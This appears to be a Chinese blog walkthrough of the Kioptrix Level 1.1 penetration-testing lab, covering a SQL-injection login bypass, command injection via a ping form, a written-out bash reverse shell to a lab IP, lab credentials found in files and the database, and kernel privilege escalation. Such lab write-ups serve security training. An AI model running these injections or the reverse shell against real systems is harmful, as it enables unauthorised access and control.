oscp——Kioptrix: Level 1.1 (#2)

0x00 前言

第三十二台机子

0x01 信息收集

在这里插入图片描述
在这里插入图片描述

0x02 Web80-webshell

访问页面之后发现是一个登录页面,这种页面看起来就像是一个SQL注入,试一下万能密码
在这里插入图片描述
成功进入后台,可以看到是一个执行ping命令的执行窗口
在这里插入图片描述
这里反弹一下shell,这里使用

bash -i >& /dev/tcp/192.168.0.111/1234 >&1

在这里插入图片描述

然后在/var/www/html目录下找到一个index文件,这里可以看道一个账号密码

"john", "hiroshima"

在这里插入图片描述
这里是了一下su,但是没有成功,然后mysql连接一下,找到一个密码
在这里插入图片描述

|    1 | admin    | 5afac8d85f |
|    2 | john     | 66lajGGbla |

0x03 webshell——rootshell

这里su 一下,但是发现密码还是错的,查一下内核版本
在这里插入图片描述
上网查了一下,可以用8542进行提权,编译一下,机子可能比较老。。。都没有放flag
在这里插入图片描述

0x04 总结

这个机子没什么坑,难度也不大

发布了478 篇原创文章 · 获赞 145 · 访问量 33万+
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 游动-白 设计师: 上身试试

分享到微信朋友圈

×

扫一扫,手机浏览